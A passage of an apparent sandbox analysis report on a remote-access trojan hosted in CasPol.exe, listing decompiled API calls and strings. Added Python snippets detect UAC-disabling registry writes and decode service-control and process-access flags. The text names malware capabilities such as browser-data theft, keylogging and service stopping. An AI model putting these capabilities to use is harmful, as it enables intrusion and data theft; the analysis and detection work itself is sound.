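    r"C:\Windows\System32\notepad.exe C:\Users\user\notes.txt",
]

if __name__ == "__main__":
    print("creation flags 0x08000000 ->", decode_creation_flags(0x08000000))
    for hit in flag_uac_tampering(SAMPLE_CMDLINES):
        print("UAC tampering:", hit)
```

Matching on the parsed key, value and data rather than on the literal string from the report is what keeps the rule useful: the same write through HKEY_LOCAL_MACHINE, a quoted key, or a lower-cased switch is still caught, while a write of 1 (re-enabling UAC) or the same value name under HKCU is not. Pair the rule with the parent process: reg.exe started from cmd.exe /k by a process that was itself spawned from a user's Downloads folder is the context that turns this from a policy change into an incident.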
                            Strings
                            • SG, xrefs: 004076DA
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, xrefs: 004076C4
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                            • API String ID: 0-3287720024
                            • Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                            • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                            • Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                            • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                            • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                            • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                            • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                            • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                            APIs
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                            • String ID: KeepAlive | Disabled
                            • API String ID: 2993684571-305739064
                            • Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                            • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                            • Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                            • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                            APIs
                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                            • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                            • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                            • Sleep.KERNEL32(00002710), ref: 0041AE07
                            • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: PlaySound$HandleLocalModuleSleepTime
                            • String ID: Alarm triggered
                            • API String ID: 614609389-2816303416
                            • Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                            • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                            • Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                            • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                            APIs
                            • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                            • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                            • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                            • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                            Strings
                            • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Console$AttributeText$BufferHandleInfoScreen
                            • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                            • API String ID: 3024135584-2418719853
                            • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                            • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                            • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                            • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                            • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                            • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                            • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                            APIs
                              • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                            • _free.LIBCMT ref: 00444E06
                            • _free.LIBCMT ref: 00444E1D
                            • _free.LIBCMT ref: 00444E3C
                            • _free.LIBCMT ref: 00444E57
                            • _free.LIBCMT ref: 00444E6E
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$AllocateHeap
                            • String ID:
                            • API String ID: 3033488037-0
                            • Opcode ID: bc830042460a8b7e4f23ea146b673c7d23acc7bc4933b5c91394f116147f2234
                            • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                            • Opcode Fuzzy Hash: bc830042460a8b7e4f23ea146b673c7d23acc7bc4933b5c91394f116147f2234
                            • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                            APIs
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                            • _free.LIBCMT ref: 004493BD
                              • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                              • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                            • _free.LIBCMT ref: 00449589
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                            • String ID:
                            • API String ID: 1286116820-0
                            • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                            • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                            • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                            • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                            APIs
                              • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                            • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                            • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                              • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                              • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                              • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                            • String ID:
                            • API String ID: 4269425633-0
                            • Opcode ID: 6f51e59ffccac79a8cfa31e78c91a9a185d84b91a830793d1a1b18643491f6ec
                            • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                            • Opcode Fuzzy Hash: 6f51e59ffccac79a8cfa31e78c91a9a185d84b91a830793d1a1b18643491f6ec
                            • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
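The three service helpers earlier in this listing (refs 0041AAB5, 0041ABB9 and 0041AC20) differ only in the access mask passed to OpenServiceW and the control code passed to ControlService, and the process walk above (CreateToolhelp32Snapshot at 0040F91B with its OpenProcess subcalls) differs from a benign process lister only in the rights it asks for. Both are easier to read once the raw hex arguments are mapped to SDK constants. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses API lines in the report's own format and decodes the flags argument of the four APIs involved. The sample lines are copied from the entries in this listing; the table of which argument carries the flags is mine, as is the assumption that only arguments inside each API's documented arity mean anything (Joe Sandbox prints the stack slots that follow the real arguments as well).

```python
import re
from typing import Dict, List, Optional

# One Joe Sandbox API line, e.g.
#   OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?), ref: 0041AAC9
API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Constants from the Win32 SDK headers (winsvc.h, winnt.h, tlhelp32.h).
SERVICE_ACCESS = {
    0x0001: "SERVICE_QUERY_CONFIG", 0x0002: "SERVICE_CHANGE_CONFIG",
    0x0004: "SERVICE_QUERY_STATUS", 0x0008: "SERVICE_ENUMERATE_DEPENDENTS",
    0x0010: "SERVICE_START", 0x0020: "SERVICE_STOP",
    0x0040: "SERVICE_PAUSE_CONTINUE", 0x0080: "SERVICE_INTERROGATE",
    0x0100: "SERVICE_USER_DEFINED_CONTROL",
}
SERVICE_CONTROL = {
    1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE",
    3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE",
}
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
TH32CS = {
    0x01: "TH32CS_SNAPHEAPLIST", 0x02: "TH32CS_SNAPPROCESS",
    0x04: "TH32CS_SNAPTHREAD", 0x08: "TH32CS_SNAPMODULE", 0x10: "TH32CS_SNAPMODULE32",
}

# api -> (0-based index of its flags argument, decode table, "mask" or "enum").
# Assumption built into this table: only arguments inside the API's documented
# arity are trusted, because Joe Sandbox also prints the stack slots after them.
DECODERS = {
    "OpenServiceW": (2, SERVICE_ACCESS, "mask"),
    "ControlService": (1, SERVICE_CONTROL, "enum"),
    "OpenProcess": (0, PROCESS_ACCESS, "mask"),
    "CreateToolhelp32Snapshot": (0, TH32CS, "mask"),
}


def decode_mask(value: int, table: Dict[int, str]) -> List[str]:
    """Split a bit mask into the named bits it contains; unknown bits stay as hex."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table.keys())
    if rest:
        names.append(f"0x{rest:X}")
    return names or ["0"]


def decode_line(line: str) -> Optional[Dict]:
    """Parse one API line; decode its flags argument when the API is in DECODERS."""
    m = API_LINE.search(line)
    if not m:
        return None
    args = [a.strip() for a in m.group("args").split(",")]
    rec = {"api": m.group("api"), "module": m.group("module"),
           "ref": m.group("ref"), "decoded": None}
    spec = DECODERS.get(rec["api"])
    if spec:
        idx, table, kind = spec
        if idx < len(args) and re.fullmatch(r"[0-9A-Fa-f]+", args[idx]):
            value = int(args[idx], 16)
            rec["decoded"] = (decode_mask(value, table) if kind == "mask"
                              else [table.get(value, f"unknown(0x{value:X})")])
    return rec


def summarize(lines: List[str]) -> List[Dict]:
    """Decoded calls, in call order, for every line that carried a known flags argument."""
    return [r for r in map(decode_line, lines) if r and r["decoded"]]


def service_action(lines: List[str]) -> Optional[str]:
    """Name what a decompiled service helper does ('stop', 'pause', 'continue')."""
    for r in summarize(lines):
        if r["api"] == "ControlService":
            return r["decoded"][0].replace("SERVICE_CONTROL_", "").lower()
    return None


# Sample input: API lines copied from the report entries, so the example runs offline.
STOP_FUNC = [
    "OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5",
    "OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9",
    "ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5",
]
PAUSE_FUNC = [
    "OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD",
    "ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9",
]
CONTINUE_FUNC = [
    "OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34",
    "ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50",
]
ENUM_FUNC = [
    "CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B",
    "Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F",
    "Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5",
    "Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208",
]

if __name__ == "__main__":
    for name, func in (("stop", STOP_FUNC), ("pause", PAUSE_FUNC), ("continue", CONTINUE_FUNC)):
        print(name, "->", service_action(func))
    for r in summarize(ENUM_FUNC):
        print(r["ref"], r["api"], r["decoded"])
```

Read through the decoder, the three helpers are a stop, a pause and a continue of a service whose name comes from the caller (SERVICE_STOP with SERVICE_CONTROL_STOP, then SERVICE_PAUSE_CONTINUE with PAUSE and with CONTINUE), and the process walk opens each process only with PROCESS_QUERY_LIMITED_INFORMATION or PROCESS_QUERY_INFORMATION. That is enough to read names, paths and PIDs; the VM_WRITE and CREATE_THREAD rights that injection needs are not requested in this routine, so treat it as the target-selection step rather than the injection itself.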
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                            • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                            • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                            • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                            • __alloca_probe_16.LIBCMT ref: 004511B1
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                            • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                            • __freea.LIBCMT ref: 0045121D
                              • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                            • String ID:
                            • API String ID: 313313983-0
                            • Opcode ID: 96f15bfe140a09faeb809ebc5c29b58b41f03d59f1561ac9dee06a5207780793
                            • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                            • Opcode Fuzzy Hash: 96f15bfe140a09faeb809ebc5c29b58b41f03d59f1561ac9dee06a5207780793
                            • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                            APIs
                            • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                              • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                            • _free.LIBCMT ref: 0044F3BF
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                            • String ID:
                            • API String ID: 336800556-0
                            • Opcode ID: d8ae35f0e3060a242d199930de563035f78cbeddf85e30d7e5766290ad92fb82
                            • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                            • Opcode Fuzzy Hash: d8ae35f0e3060a242d199930de563035f78cbeddf85e30d7e5766290ad92fb82
                            • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                            APIs
                            • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                            • _free.LIBCMT ref: 004482D3
                            • _free.LIBCMT ref: 004482FA
                            • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                            • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$_free
                            • String ID:
                            • API String ID: 3170660625-0
                            • Opcode ID: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                            • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                            • Opcode Fuzzy Hash: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                            • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                            APIs
                            • _free.LIBCMT ref: 004509D4
                              • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                              • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                            • _free.LIBCMT ref: 004509E6
                            • _free.LIBCMT ref: 004509F8
                            • _free.LIBCMT ref: 00450A0A
                            • _free.LIBCMT ref: 00450A1C
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            APIs
                            • _free.LIBCMT ref: 00444066
                              • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                              • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                            • _free.LIBCMT ref: 00444078
                            • _free.LIBCMT ref: 0044408B
                            • _free.LIBCMT ref: 0044409C
                            • _free.LIBCMT ref: 004440AD
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            APIs
                            • _strpbrk.LIBCMT ref: 0044E738
                            • _free.LIBCMT ref: 0044E855
                              • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                              • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                              • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
                            Similarity
                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                            • String ID: *?$.
                            • API String ID: 2812119850-3972193922
                            APIs
                            • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                              • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                              • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                            Similarity
                            • API ID: CreateFileKeyboardLayoutNameconnectsend
                            • String ID: XQG$NG$PG
                            • API String ID: 1634807452-3565412412
                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: `#D$`#D
                            • API String ID: 885266447-2450397995
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00443475
                            • _free.LIBCMT ref: 00443540
                            • _free.LIBCMT ref: 0044354A
                            Similarity
                            • API ID: _free$FileModuleName
                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                            • API String ID: 2506810119-3657627342
                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                              • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                              • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                              • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                              • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                            • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                            Similarity
                            • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                            • String ID: /sort "Visit Time" /stext "$0NG
                            • API String ID: 368326130-3219657780
                            APIs
                            • _wcslen.LIBCMT ref: 004162F5
                              • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                              • Part of subcall function 00413877: RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                              • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                              • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                            Similarity
                            • API ID: _wcslen$CloseCreateValue
                            • String ID: !D@$okmode$PG
                            • API String ID: 3411444782-3370592832
                            APIs
                              • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                            • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                            Strings
